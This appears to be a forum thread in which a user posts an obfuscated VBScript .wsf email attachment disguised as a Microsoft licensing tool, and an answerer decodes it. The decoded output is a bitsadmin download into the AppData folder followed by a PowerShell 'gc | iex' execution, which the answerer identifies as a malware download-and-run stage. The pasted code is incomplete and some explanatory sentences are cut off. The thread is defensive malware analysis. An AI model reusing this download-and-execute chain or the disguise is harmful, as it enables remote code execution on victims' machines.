this morning I received a mal containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :( Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
' Copyright (c) Microsoft Corporation. All rights reserved.
' Windows Software Licensing Management Tool.
Set ISUaUv=WScript.CreateObject("WScript.Shell")
For Each nEZVNX In arr
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next KcSOUa,false,-1
Thank you!
The fact it obfuscates itself is a good indicator it maybe malicious, if you want to see what it's attempting to run you can;
Comment out this line (like below);
' KcSOUa,false,-1
Add this line below it;
WScript.Echo KcSOUa
When you run the script you will get this output;
powershell -c ""&bitsadmin /transfer rDIlrsRC %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
It looks to be using gc
applet in PowerShell) to pull the content of the file into a string using the Out-String
command. It then pipes this to iex
command) to be executed.
The likelihood is the inter.xls
file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.